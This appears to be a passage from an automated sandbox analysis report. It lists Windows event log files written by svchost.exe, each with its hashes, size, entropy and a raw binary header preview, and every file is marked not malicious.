                                                                                                    Preview:ElfChnk......................................=..H?..........................................................................S..l................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...........................................................................................................v)....../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9560
                                                                                                    Entropy (8bit):4.558369973546456
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:sLM2sCMjjM+NEMBkTMgtMi6MidMNWpFMBQMVrM++MtMBM0:sLM2FMPM+uMBkTMgtMDMidMNiFMBQMVQ
                                                                                                    MD5:263D664CC474CEC6F47A8DE63477BEDC
                                                                                                    SHA1:33F5E6CD133D54A31E9F66B264F6F393FCF36361
                                                                                                    SHA-256:9728022BC913E5F5FF6D3DE28923AEAC7ECF39533C59272868FDB4849677457A
                                                                                                    SHA-512:6798968F5EDDB9C5A9ADA60CD191ACF06B0E1934AC7AB6D4CAE5631C18EEAD46D599721FB5CAC65666FEA0176EC617AC0FB5D85605E5673A5B405C72D6FCAFD1
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk..).......).......).......)...........Q...S...p......................................................................0..........................................6...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**.......)......83............F..&.......................................................................F.....!...A.A...........83..........v....................)...................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e..7*...\..C.....M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e./.O.p.e.r.a.t.i.o.n.a.l......................I.......I.n.v.o.k.i.n.g. .l.i.c.e.n.s.e. .m.a.n.a.g.e.r. .b.e.c.a.u.s.e. .l.i.c.e.n.s.e./.l.e.a.s.e. .p.o.l.l.i.n.g. .t.i.m.e. .u.p.:. .P.F.N. .M.i.c.r

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 17, DIRTY
                                                                                                    Category:dropped
                                                                                                    Size (bytes):80312
                                                                                                    Entropy (8bit):1.9492917756357486
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:IKhL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUm7UmLcUmWUmnUmHUmxUAhL6d:bY7LU7Y7LU
                                                                                                    MD5:41DAD588FDBAB26368B92CCDA293F0CE
                                                                                                    SHA1:9CD4298F9F3E7B288F66852D1055125E4230146D
                                                                                                    SHA-256:239EC77C0621EFCE814506C9337A4279B138D65DDDB61656B9DD1E03C74A6519
                                                                                                    SHA-512:2687CB764CFF69EA786779F39EDFD985BBCE33D61B8DB645489A81FCD9E709387AC7F2A868CD6AF533B199D2E875E7E02D6A9A0B33546E52625C7F3FA8725AFC
                                                                                                    Malicious:false
                                                                                                    Preview:ElfFile.......................................................................................................................ElfChnk......................................6..89....6.....................................................................K|................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&............................................................................................................*..........**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.2039440277760787
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:MKQgVWd8VcrP+8QNRBEZWTENO4brBT3oU/6y:TN/NVaO8JoU/6y
                                                                                                    MD5:62BFC17D9DD9113C324EC8B9610B3C0C
                                                                                                    SHA1:225E05188513A18CD566AC20FC7975AAB73EF4D1
                                                                                                    SHA-256:356FBF771A10D71AA2751428B8CCFD59E1CC3FC6960FA1370352A490A3F50BF8
                                                                                                    SHA-512:776BBE99AF0CB95DDD117EC3D4026E0551FA1ACEBEEBC9214EF928318277BC22917473C8A1B73C33865ADE64960CF6FCDEA49A6B8F15F550B24BA86A45FB27D5
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk............................................._..!.....................................................................zi.................".......................J...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..................c.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.087485950532485
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:QhIivhiuiMidiyiMi3iEiziXviiqYiMciEiri9iuiLsRi11iWiRmiNiHibifiGij:QjZvaQKxQSp
                                                                                                    MD5:1CC05E63A6FFCC50D54F4324BD2C7811
                                                                                                    SHA1:DFE8105D53EBB7B4851DE499C3B1CDAC29BBC539
                                                                                                    SHA-256:1CAFEC0896015276D8F86654E349A1096854B8B03D5A6C658CF1B4EAB4B64AA9
                                                                                                    SHA-512:6287C22B3A4AB4A6134AAB15DB23483C446A069DAF954AE748B135ACE9A9CD69933DCB4F3DDDFDE82BF7E752E674B82F61D4F73355BDFD80ED3DE8E5927ADDAD
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.y...............y...................P...`...o..F....................................................................q....................#..a.......................=.......................#...................................................................................................f...............?................'......P.......................M...F............................................#..............................................................................w#.......'...0..........**......y.......>}.T............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):3.4025051000319846
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:MVaQLFaLarava7a7aDaraLaja3ava/azafaXa3a7aPaXa/7a/a7aHaDazafa3afq:8LZ
                                                                                                    MD5:840F5AA6E1914C4CDEC9220E2AE4A843
                                                                                                    SHA1:BC75C5EE2A1E2169B36A4874EBF113646A5D034B
                                                                                                    SHA-256:765AC4F4398379F8104B53BA2DE7001075FDA67DD448D503CDF721396B703CAF
                                                                                                    SHA-512:922BDEC8DA3E4D268DB0379F79CD83CB1ABFA51B8AE9AE03D0902F1E79F5779E204E5877227F858ED6873E532615C4F64C5060B93B9F37A88865B9D8D4ADF6DE
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........@...............@...............`....]x.....................................................................N..E................b...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................;.......................&...........**..H...........^.Q.c.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):1.5632048477611973
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:7haXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJ1qXJNXJLJXJxXJBXJfXJKHp:7Q0yUkNYwD8imLEUzL/HXxSzZziM
                                                                                                    MD5:4B7624575B10C7F3CD081E7D724382F1
                                                                                                    SHA1:5966702F939AC4A5FB16900D936ACA3F0B4AB580
                                                                                                    SHA-256:133F9DCBDDD1629567E67B458E39BCC655781C47666EA58E3EE2B7617A2834B8
                                                                                                    SHA-512:E7F3680269B36A3535ED8AAF1AF428222019E5053C3729163B007FC9784805333BAE7D170F57A241F69FDDC2AD08395D92A93598C752EC22F63F9A6D5412EAB3
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk......................................M...P.../L......................................................................=.&................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........................................................C................3..........**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.34316192900768
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:Yh/mcmtmrmsm1mkmQm6m4mnmdmgmsmnmChmxmom9m2m2mwmO6mTmUm2mRmVmEmmj:Y9gxPuxE9KA
                                                                                                    MD5:4102047428B20D9D4B2D3A26F7151FB4
                                                                                                    SHA1:4451C106BE65D6F70FE2CE347982866CC4BE6E47
                                                                                                    SHA-256:B8EADE7EC54F7A1AAC4F51C6FC2098B46323CE5886767FBD4CCAE07B2ED80106
                                                                                                    SHA-512:6C83D9709DB9B8DFFB985E5AD442E731684C1DA26558821D4BAE55497054C68C6F41AF26D96267E71310FEC21A5379E3A36C8DB0225CF843E23AE8774243B5F0
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk......................................^..._...!.5....................................................................../m................L.......................t...=...........................................................................................................................f...............?...........................m...................M...F...............................................s...........................................%...........................................&...........**..p.............k...........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):1.7810586310433003
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:khK2nl2U52N2h2Ii2wAx2wI2ff2iW2R12Qc2nT232v2D232H2D2H272g2U2o2k2H:kpA
                                                                                                    MD5:BDEF891EF7B1AD4CA62DC1D39F0FD231
                                                                                                    SHA1:ECDE709F5B21BA191DDCFFD9436EC690978A5AB7
                                                                                                    SHA-256:D8BF8A393D47CFE4D8FFF074014407F5DA8379DED71CCD3BF49AB99ADDF15134
                                                                                                    SHA-512:95BD06A07515F11FA2121D39D36968F2021CA94CC6FA1F73F7CE252AF9227D6A6339A217CC480443EA7F691D314A558EE00A0876E794310EAAE5C724EE5EA330
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk......................................T...V..e.b........................................................................h................N.......................v...=...........................................................................................................................f...............?...........................m...................M...F...............................'.......................................................................................................&...........**...............a............F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):78408
                                                                                                    Entropy (8bit):4.282609257341318
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:VhuRX0Re7HRuRoRqRWRvkRJRQRERwRMRzRSR5RxR2R/WRDXRRcR9XRB6RpRtRYRW:V7po
                                                                                                    MD5:FC2A863A35C7F702740386CD62F1C7A7
                                                                                                    SHA1:1C4DCC57088F23DA130F149F6C3A31B0F0FBA8F5
                                                                                                    SHA-256:E1174C0D7ABAD83296A9752D992AE06613303B7DF9958D061A3F0D518F403BD9
                                                                                                    SHA-512:E89558CE7EF93C12E03779165C14813FC8FC87D857373D70F6AE642A3FA5CDC8E8E357F8252A47B5F29E45E607CDE94B449F40B9B29552A1E1D68284A2AA31D3
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........................................p!...x......................................................................'.......................*.......8...7...........=.......................................8...K.......................?.......................................................f...\.......|...?.......................Q.......................M...F...I.......................................&.......a...............................................*...............................................**..................c............&............LS.....'.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.261655538470567
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:7hghshy2h0hEhDh9vhghp6hJhFhrh0h7h/h3hNh+hKhWhsUhyzhhFhYhkhghIhoq:7ipkBSqL8wD
                                                                                                    MD5:F80062BC5DE8946E5DF1CDAB26CAD49D
                                                                                                    SHA1:6BFC6C03355920E95FD728C201E6F633A8882845
                                                                                                    SHA-256:51AAFAFE9EE0EB08A7B235FC9F750EADADF0318AC256D630465FFA740DA56E1D
                                                                                                    SHA-512:EDDDD1E0E11F46F6AFB102823BAE53D47407C12AF826488D24C39E4E1E670700F6B3FD0797F0F886FF4C8E91FB6068B9495527BA46B83FC28EA6AAEB4284385F
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk......................................<..8>.....G................................................................................................................l...=...........................................................................................................................f...............?...........................m...................M...F...........................................a.......................................................................................9...&...........**..@.........................F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):1.4656427357304675
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:2hOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOV5VqVFlVmV8VV2:2yjbS
                                                                                                    MD5:074EF6F30FDD10C7C48FEF9F16C99AAF
                                                                                                    SHA1:F41C4C8C1D5CC83B057A57FFE4DCF1214E015E55
                                                                                                    SHA-256:D4A6741B9BC6F53FDEF7CC6749F3658B2A5A8417DE73203F7E1EFD74174B08DC
                                                                                                    SHA-512:B9F52C2F1ACE7C09379F86B2C7410555AE2C40910F047153DE92605FCDA093D44D0617FFF905A491D69FD064ABC05B7197898C27A1C8B4F53DBD57F6B4C138FB
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........*...............*...........`C...D...TVw....................................................................x..T................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v...........................................................................&*..........**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-WinRM%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 101, DIRTY
                                                                                                    Category:dropped
                                                                                                    Size (bytes):130984
                                                                                                    Entropy (8bit):4.204698818398912
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:hL5v0NuJKOXvb6mBylNGkVdNWN/3kUbzVVRa6vwVQldASo0RXk9gjdkINbRkmkbH:3hBlIhBl
                                                                                                    MD5:0A228C54719EACC6DB3677E25AE59DC3
                                                                                                    SHA1:3B74DF89B9137319BF8E3C24639473E6AD639FB1
                                                                                                    SHA-256:9A06F45961EC8309AC8E6A0A003505DC399FF13532029DFB79707279BE77B6C7
                                                                                                    SHA-512:D42A62119CB23844EEB9397505AF7F0BBA7D16FC403060331BC52C5E3CC6E7D3B7BB26666D57F1C64844B8A53A736F6A95C709D96E9883E21B827CB73A3E1864
                                                                                                    Malicious:false
                                                                                                    Preview:ElfFile.................e.......................................................................................................ElfChnk.........h...............h...............(.....................................................................................................................B...=...........................................................................................................................f...............?...........................m...................M...F...................................=.......................&...........................................................-...........................**..X...........|.$2..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.261809907415983
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:4/NqObx/88sonUUPgDTYj+rrH41l4o5obbM0Xi1kL3kW3On:UNx/8FonUPDTYCrrH41mi1kL3kW3o
                                                                                                    MD5:DA25C4012DD63CFD6F62F487BE3F23FA
                                                                                                    SHA1:5544AABF1BC4CB47DAB1B3C06DD37DA146E54CB8
                                                                                                    SHA-256:FA6D1DB7335936183782553BDD8E9A4D1D65AE890AD24E8EDA61DA37F8DA0EED
                                                                                                    SHA-512:E55CAF1463BF38A73C4EAD90E6C667B0EEC2867D8B496C7EB2D8FB53623CC9122D77EB048D903F73FC10BE0C04F312857184349121D30D722182C07123F1E0FC
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.....................................@...p...s.z.....................................................................)N}.............................................=...........................................................................................................................f...............?...........................m...................M...F...................o0.......&...................,..............................................g)...........................#..........&...........**..H..............A..........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.396927121782266
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:xh4UEiUEfUE5UE0UEfUEtUEpUEAUELUEvUEcUEJUEBUE3UEHUERUExUEeUEaUEjD:xtyc+S6IO
                                                                                                    MD5:6462E68C1BB0D96E1D661B401E9EFD6B
                                                                                                    SHA1:51292A046054DF2C4239A8BD7118625F150A85E3
                                                                                                    SHA-256:D1D48EE8477EBB1478B4C41BD468E1323859E008EB7B1111DECAE1245DAAAB59
                                                                                                    SHA-512:4B2C51A5159D38615AAE35805D8D4A6A68D56F34D4E6FB06304C8DC67F513FC6BCF897C4F4AFF65BE60DDFA91D8A43D1005EE8A75BDE8BD890FB86D3203A6C96
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........................................h......i.....................................................................l.3................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..............4.............F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Security.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.3135221839704165
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:HFRotuoLCZocC60zCwyZowMtHJoUyowMtOAoR5OdVoVlobFoHFo9Uoz0onGfoHYq:l30DyBpm6bLAr1
                                                                                                    MD5:E0A40505C8C2EBF053AB9F18132DBA4E
                                                                                                    SHA1:A75BAF87CCE8593A7403ACCBDB28D311A09C5399
                                                                                                    SHA-256:B5AA7AA283F17A4A0D47184583186CC9D3D6491BD5A20731D6CFEF51CCEB5CB6
                                                                                                    SHA-512:5EDE93E3EF88CCE6E1C1B6A02E152D76514C53202204CF73484E7865FFFC07ACB9A8153347AC56212E78023B3E055906385530C7A71AF0159361143CB8DCDE4C
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk......................................... ...q..`......................................................................[.....................s...h...............N...=...................................................N...............................................w.......6......................./...................................]...........).......M...T...:.......................................................................................&.......................................................**.. ...........^2............0.;M&.......0.;M.j.Y)..G2.zA.......A..5...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....^...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

                                                                                                    C:\Windows\System32\winevt\Logs\System.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):67296
                                                                                                    Entropy (8bit):4.4303032774422935
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:tBnGvAFRUyQiBnGvkojlp5mavjGVibT9EB51mXQw5swn1Lpl+ml7Okqp7pZ1o86W:XGv23zGv3PabuNpVKI5R+aTpv
                                                                                                    MD5:3CDE602B37A82D269E05131CF870E614
                                                                                                    SHA1:C0A76E2410137D0BF4E3A89F139BF472691D3F76
                                                                                                    SHA-256:777642A48E98DEE15FE7847B92C77988EF92C4285DC8F0E50329C9AB7606C948
                                                                                                    SHA-512:4D11E7814ECB92D076D342FEAECB8832E5C30B770275CDB98076AD855B87FC654CC040EF37ADDE5022C4C43965CD31DA8A134EC31FF5D0AF2FE88CD4C527DF76
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.............................................F.........................................................................f.................>...s...h...............f...=...................................................N...............................................w.......2.......................G...................................Y...........).......M...5...:...................................&....................................................................... .......................&...........**..............z............F..&.......F...0.V%.d..wr.........A......M...s....j.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....V........A..............F=.................A....................................N................w............................................................A...............:...............h.........A..............F..................A......).......FN........s............................

                                                                                                    C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):2.9506400640295167
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:dQZL/EQ97CwGMGkN/yGtbJA5GehgbtdSN+N0aa:dWN/yUbJAcehghdSI
                                                                                                    MD5:1612775A4A7465C0F02095C88146B4D5
                                                                                                    SHA1:DB082396FFAC3E3DBDA18D16260330CEE43F8F4C
                                                                                                    SHA-256:1F57632FB552EC930DD245A28C7472A667DCB86123C10BC55A32020BFFAFAD94
                                                                                                    SHA-512:8324FE7EFE86C4295B7DC0D44D3A66061ECD4729DE6EDF1BFD6B4483F4FDAE847AED803D2234FEE94FB6B8CAEB4F970CA674C4A74BCF9372528EC3B227FF3E71
                                                                                                    Malicious:false
